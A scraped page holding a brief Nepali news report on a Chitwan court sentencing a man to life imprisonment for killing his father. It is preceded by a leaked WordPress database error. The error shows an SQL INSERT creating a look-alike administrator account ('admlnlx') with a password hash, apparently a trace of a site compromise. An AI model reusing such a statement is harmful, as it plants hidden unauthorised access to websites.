WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3dGAbav/7MbENFcJDTaog.dklW6BO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:26:19', '', 'admlnlx', 'admlnlx')
चितवन, माघ २१–
चितवनमा बाबुको हत्या आरोप लागेका एक युवकलाई बिहीबार जन्मकैद फैसला भएको छ ।
चितवन अदालतका न्यायाधीश उमानाथ गौतमको इजलासले बाबुकोे हत्या आरोपी २८ वर्षका विनोद सापकोटालाई सर्वस्वसहित जन्मकैदको फैसला गरेको आजको चितवन पोष्ट दैनिकमा खबर छ ।
विनोद सापकोटाविरूद्ध उनकै दाजु ३० वर्षका विकास सापकोटाले असोज २८ गते जिल्ला प्रहरी कार्यालय चितवनमा जाहेरी दिएका थिए । चितवन जिल्ला अदालतले कात्तिक ११ गते अन्यायी विनोद सापकोटालाई पूर्पक्ष थुनामा राख्ने आदेश दिए पनि बिहीबार सर्वस्वसहित जन्मकैदको फैसला सुनाएको हो । गत असोज २२ गते घरायसी झगडामा भरतपुर उपमहानगरपालिका–१९ बस्ने ६३ वर्षका बुबा वसन्त सापकोटालाई धारिलो हतियार प्रयोग गरी विनोद सापकोटाले घाइते बनाएको उपचार गर्न भरतपुरतर्फ ल्याउँदै गर्दा बाटोमै मृत्यु भएको जाहेरीमा उल्लेख थियो ।